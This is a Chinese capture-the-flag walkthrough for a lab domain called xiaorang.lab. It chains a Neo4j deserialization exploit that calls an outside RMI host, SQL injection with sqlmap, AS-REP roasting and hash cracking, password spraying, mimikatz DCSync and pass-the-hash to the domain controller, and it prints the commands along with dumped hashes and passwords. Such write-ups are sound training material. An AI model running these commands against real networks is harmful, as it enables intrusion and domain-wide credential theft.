春秋云境 Time
flag01
1 2 3 4 5 6 7 8 9 10 11 12 13 39.99.255.178:1337 open 39.99.255.178:7473 open 39.99.255.178:7474 open 39.99.255.178:7687 open 39.99.255.178:39773 open [*] alive ports len is: 5 start vulscan 已完成 0/5 [-] webtitle https://39.99.255.178:1337 Get "https://39.99.255.178:1337" : EOF [*] WebTitle: http://39.99.255.178:7474 code:303 len:0 title:None 跳转url: http://39.99.255.178:7474/browser/ [*] WebTitle: http://39.99.255.178:7474/browser/ code:200 len:3279 title:Neo4j Browser [*] WebTitle: https://39.99.255.178:7473 code:303 len:0 title:None 跳转url: https://39.99.255.178:7473/browser/ [*] WebTitle: https://39.99.255.178:7687 code:400 len:50 title:None [*] WebTitle: https://39.99.255.178:7473/browser/ code:200 len:3279 title:Neo4j Browser
发现neo4j,使用CVE-2021-34371攻击
1 java -jar rhino_gadget.jar rmi://39.98.110.107:1337 "touch /tmp/123"
1 cat /home/neo4j/flag01.txt
flag02
扫描内网,搭建代理
1 2 3 4 5 6 7 8 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.22.6.36 netmask 255.255.0.0 broadcast 172.22.255.255 inet6 fe80::216:3eff:fe05:e4f7 prefixlen 64 scopeid 0x20<link > ether 00:16:3e:05:e4:f7 txqueuelen 1000 (Ethernet) RX packets 135368 bytes 165481073 (165.4 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 71891 bytes 15950459 (15.9 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ./fs -h 172.22.6.1/24 -o result.txt 172.22.6.36:7687 open 172.22.6.12:135 open 172.22.6.38:80 open 172.22.6.38:22 open 172.22.6.36:22 open 172.22.6.25:445 open 172.22.6.12:445 open 172.22.6.25:139 open 172.22.6.12:139 open 172.22.6.12:88 open 172.22.6.25:135 open [*] alive ports len is: 11 start vulscan [*] NetInfo: [*]172.22.6.12 [->]DC-PROGAME [->]172.22.6.12 [*] NetInfo: [*]172.22.6.25 [->]WIN2019 [->]172.22.6.25 [*] NetBios: 172.22.6.25 XIAORANG\WIN2019 [*] 172.22.6.12 (Windows Server 2016 Datacenter 14393) [*] WebTitle: http://172.22.6.38 code:200 len:1531 title:后台登录 [*] NetBios: 172.22.6.12 [+]DC DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle: https://172.22.6.36:7687 code:400 len:50 title:None
访问38的后台界面,存在sql注入,可以拿到第二个flag
1 python sqlmap.py -r requests.txt -D oa_db -T oa_f1Agggg --dump --batch
flag03
从数据库中可以拿到一堆用户名,表大小的原因可能导致显示不全,需要在excel表中找
1 2 3 4 5 6 7 8 9 10 11 12 13 import rewith open ('username.txt' ,'r' ) as files: for file in files: email_pattern = re.compile (r'\b[\w.-]+@xiaorang\.lab\b' ) emails = email_pattern.findall(file) for email in emails: print (email)
写个脚本可以把用户名提出来,先确认一下哪些是有效的域内用户,然后用脚本提取出来
1 kerbrute_windows_amd64.exe userenum --dc 172.22.6.12 -d xiaorang.lab username.txt -t 10
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 weixian@xiaorang.lab shuzhen@xiaorang.lab xuanjiang@xiaorang.lab wengbang@xiaorang.lab xiqidi@xiaorang.lab gaiyong@xiaorang.lab yuanchang@xiaorang.lab lvhui@xiaorang.lab wenbo@xiaorang.lab zhenjun@xiaorang.lab jinqing@xiaorang.lab yangju@xiaorang.lab weicheng@xiaorang.lab weixian@xiaorang.lab haobei@xiaorang.lab jingze@xiaorang.lab zhaoxiu@xiaorang.lab jizhen@xiaorang.lab qiyue@xiaorang.lab rubao@xiaorang.lab liangliang@xiaorang.lab tangshun@xiaorang.lab chouqian@xiaorang.lab jicheng@xiaorang.lab xiyi@xiaorang.lab chenghui@xiaorang.lab beijin@xiaorang.lab yanglang@xiaorang.lab chebin@xiaorang.lab pengyuan@xiaorang.lab jihuan@xiaorang.lab duanmuxiao@xiaorang.lab gaijin@xiaorang.lab hongzhi@xiaorang.lab yifu@xiaorang.lab fusong@xiaorang.lab tangrong@xiaorang.lab luwan@xiaorang.lab dongcheng@xiaorang.lab zhufeng@xiaorang.lab lianhuangchen@xiaorang.lab lili@xiaorang.lab wenshao@xiaorang.lab huabi@xiaorang.lab rangsibo@xiaorang.lab wohua@xiaorang.lab haoguang@xiaorang.lab langying@xiaorang.lab manxue@xiaorang.lab diaocai@xiaorang.lab baqin@xiaorang.lab lianggui@xiaorang.lab louyou@xiaorang.lab chengqiu@xiaorang.lab weishengshan@xiaorang.lab maqun@xiaorang.lab wenbiao@xiaorang.lab zhangxin@xiaorang.lab chuyuan@xiaorang.lab wenliang@xiaorang.lab luyue@xiaorang.lab yulvxue@xiaorang.lab ganjian@xiaorang.lab guohong@xiaorang.lab pangzhen@xiaorang.lab sheweiyue@xiaorang.lab lezhong@xiaorang.lab dujian@xiaorang.lab lidongjin@xiaorang.lab hongqun@xiaorang.lab yexing@xiaorang.lab maoda@xiaorang.lab qiaomei@xiaorang.lab ganjian@xiaorang.lab
AS-REPRoasting
在AS_REP阶段,会返回由我们请求的域账户hash加密某个值后返回。然后我们通过自身的ntlm hash去解密得到数据。在这里设置不要求预身份验证后,我们可以在AS_REQ阶段,填写想要伪造请求的用户名,随后会用伪造请求的用户名NTLM Hash加密返回给我们。随后我们就可以拿去爆破了
使用域内有效用户去查SPN
1 proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/
查找到两个
1 2 $krb5asrep$23$wenshao @xiaorang.lab@XIAORANG.LAB:48943048f6bc84479d855419597b7700$3a745d07844aeda98c3f774b382f42d0126606d0aa030ffd6d4992ef60ecc8abc770ee4dffe49ba0ed9ce93549a7540f20f1fffa0f667cb4354f5a1ed25c3c64961967729997e8190989ed990e36558d6b3e85d0403caa763187fee7b6b57facea423d08b5371668b3406bbef49d742b1dd09026928ca38b915fe74a0161d489f4502703510e6c2d6b5e33db2f5eaa61f7ec5bbb5f6267305b46835baf2f1ecf5c1681019f1de85f34331abaa399f067c67e064c344017ab736d96cdc741a6f71e28c90c8c351a1f894cee8cd1cfef6ab98232ac372850f9ad433ed8e1617302825a7682291da5890e70d0f0 $krb5asrep$23$zhangxin @xiaorang.lab@XIAORANG.LAB:3acdd0fbfdd7ff3e9b671009f07cd6dc$b5fe8d174a85d538df4b1660f58758069e1a5393d6c3957f16026e0808f32e845a1c921bade6b247b831480743f5b6dedc2a1fc46025e0b5ea5878dafb090fb7b9e5dbb281faeb5e713976144769c5e248e404df8644cf1fe1abc326936724b0bf9af647630d7784b14deed290299170dde2d49cee2ed28b86d33085d830456a75d96d86b1a83f917338e0047842374433310c7d1f3a12e924eafaa344f30ef2e1a095608f99a55c9f1c550c17031d88eb901919c3f806ba05bf4c3f4dc4b8993fb60f9d2a6e0cdebf727e0908bc7b61ff559b507f68b24cc41c5f43a8e5173642fdac1e105ef49c5bad16a9
爆破明文
1 hashcat -a 0 -m 18200 --force hash.txt ./rockyou.txt
1 2 wenshao@xiaorang.lab:hellokitty zhangxin@xiaorang.lab:strawberry
爆破一波rdp
1 proxychains4 crackmapexec smb 172.22.6.1/24 -u user.txt -p pass.txt --continue-on-success 2>/dev/null
rdp上去,用bloodhound做一下信息收集
如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。
简单来说yuxuan属于域管,所以现在拿到yuxuan的权限然后dump哈希就好了,上小豆子收集一波信息
1 2 3 4 5 ╔══════════╣ Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : xiaorang.lab DefaultUserName : yuxuan DefaultPassword : Yuxuan7QbrgZ3L
可以发现自动登录用户,正好就是yuxuan,用此用户rdp上去,dump域管哈希
1 mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
结果如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 [DC] 'xiaorang.lab' will be the domain [DC] 'DC-PROGAME.xiaorang.lab' will be the DC server [DC] Exporting domain 'xiaorang.lab' [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) 1103 shuzhen 07c1f387d7c2cf37e0ca7827393d2327 512 1104 gaiyong 52c909941c823dbe0f635b3711234d2e 512 1106 xiqidi a55d27cfa25f3df92ad558c304292f2e 512 1107 wengbang 6b1d97a5a68c6c6c9233d11274d13a2e 512 1108 xuanjiang a72a28c1a29ddf6509b8eabc61117c6c 512 1109 yuanchang e1cea038f5c9ffd9dc323daf35f6843b 512 1110 lvhui f58b31ef5da3fc831b4060552285ca54 512 1111 wenbo 9abb7115997ea03785e92542f684bdde 512 1112 zhenjun 94c84ba39c3ece24b419ab39fdd3de1a 512 1113 jinqing 4bf6ad7a2e9580bc8f19323f96749b3a 512 1115 yangju 1fa8c6b4307149415f5a1baffebe61cf 512 1117 weicheng 796a774eace67c159a65d6b86fea1d01 512 1118 weixian 8bd7dc83d84b3128bfbaf165bf292990 512 1119 haobei 045cc095cc91ba703c46aa9f9ce93df1 512 1120 jizhen 1840c5130e290816b55b4e5b60df10da 512 1121 jingze 3c8acaecc72f63a4be945ec6f4d6eeee 512 1122 rubao d8bd6484a344214d7e0cfee0fa76df74 512 1123 zhaoxiu 694c5c0ec86269daefff4dd611305fab 512 1124 tangshun 90b8d8b2146db6456d92a4a133eae225 512 1125 liangliang c67cd4bae75b82738e155df9dedab7c1 512 1126 qiyue b723d29e23f00c42d97dd97cc6b04bc8 512 1127 chouqian c6f0585b35de1862f324bc33c920328d 512 1128 jicheng 159ee55f1626f393de119946663a633c 512 1129 xiyi ee146df96b366efaeb5138832a75603b 512 1130 beijin a587b90ce9b675c9acf28826106d1d1d 512 1131 chenghui 08224236f9ddd68a51a794482b0e58b5 512 1132 chebin b50adfe07d0cef27ddabd4276b3c3168 512 1133 pengyuan a35d8f3c986ab37496896cbaa6cdfe3e 512 1134 yanglang 91c5550806405ee4d6f4521ba6e38f22 512 1135 jihuan cbe4d79f6264b71a48946c3fa94443f5 512 1136 duanmuxiao 494cc0e2e20d934647b2395d0a102fb0 512 1137 hongzhi f815bf5a1a17878b1438773dba555b8b 512 1138 gaijin b1040198d43631279a63b7fbc4c403af 512 1139 yifu 4836347be16e6af2cd746d3f934bb55a 512 1140 fusong adca7ec7f6ab1d2c60eb60f7dca81be7 512 1141 luwan c5b2b25ab76401f554f7e1e98d277a6a 512 1142 tangrong 2a38158c55abe6f6fe4b447fbc1a3e74 512 1143 zhufeng 71e03af8648921a3487a56e4bb8b5f53 512 1145 dongcheng f2fdf39c9ff94e24cf185a00bf0a186d 512 1146 lianhuangchen 23dc8b3e465c94577aa8a11a83c001af 512 1147 lili b290a36500f7e39beee8a29851a9f8d5 512 1148 huabi 02fe5838de111f9920e5e3bb7e009f2f 512 1149 rangsibo 103d0f70dc056939e431f9d2f604683c 512 1150 wohua cfcc49ec89dd76ba87019ca26e5f7a50 512 1151 haoguang 33efa30e6b3261d30a71ce397c779fda 512 1152 langying 52a8a125cd369ab16a385f3fcadc757d 512 1153 diaocai a14954d5307d74cd75089514ccca097a 512 1154 lianggui 4ae2996c7c15449689280dfaec6f2c37 512 1155 manxue 0255c42d9f960475f5ad03e0fee88589 512 1156 baqin 327f2a711e582db21d9dd6d08f7bdf91 512 1157 chengqiu 0d0c1421edf07323c1eb4f5665b5cb6d 512 1158 louyou a97ba112b411a3bfe140c941528a4648 512 1159 maqun 485c35105375e0754a852cee996ed33b 512 1160 wenbiao 36b6c466ea34b2c70500e0bfb98e68bc 512 1161 weishengshan f60a4233d03a2b03a7f0ae619c732fae 512 1163 chuyuan 0cfdca5c210c918b11e96661de82948a 512 1164 wenliang a4d2bacaf220292d5fdf9e89b3513a5c 512 1165 yulvxue cf970dea0689db62a43b272e2c99dccd 512 1166 luyue 274d823e941fc51f84ea323e22d5a8c4 512 1167 ganjian 7d3c39d94a272c6e1e2ffca927925ecc 512 1168 pangzhen 51d37e14983a43a6a45add0ae8939609 512 1169 guohong d3ce91810c1f004c782fe77c90f9deb6 512 1170 lezhong dad3990f640ccec92cf99f3b7be092c7 512 1171 sheweiyue d17aecec7aa3a6f4a1e8d8b7c2163b35 512 1172 dujian 8f7846c78f03bf55685a697fe20b0857 512 1173 lidongjin 34638b8589d235dea49e2153ae89f2a1 512 1174 hongqun 6c791ef38d72505baeb4a391de05b6e1 512 1175 yexing 34842d36248c2492a5c9a1ae5d850d54 512 1176 maoda 6e65c0796f05c0118fbaa8d9f1309026 512 1177 qiaomei 6a889f350a0ebc15cf9306687da3fd34 512 502 krbtgt a4206b127773884e2c7ea86cdd282d9c 514 500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512 1000 DC-PROGAME$ 9534a3db96c011d40a133aa22ba4d65a 532480 1181 WIN2019$ 9f0b5119be244f76a96a9a4cd2c77af5 4096 1178 wenshao b31c6aa5660d6e87ee046b1bb5d0ff79 4260352 1179 zhangxin d6c5976e07cdb410be19b84126367e3d 4260352 1180 yuxuan 376ece347142d1628632d440530e8eed 66048
横向域控
1 proxychains4 impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12 -codec gbk
1 type c:\users \administrator\flag\flag04.txt
flag04
1 proxychains4 impacket-smbexec -hashes :04 d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
1 type c:\users \administrator\flag\flag03.txt
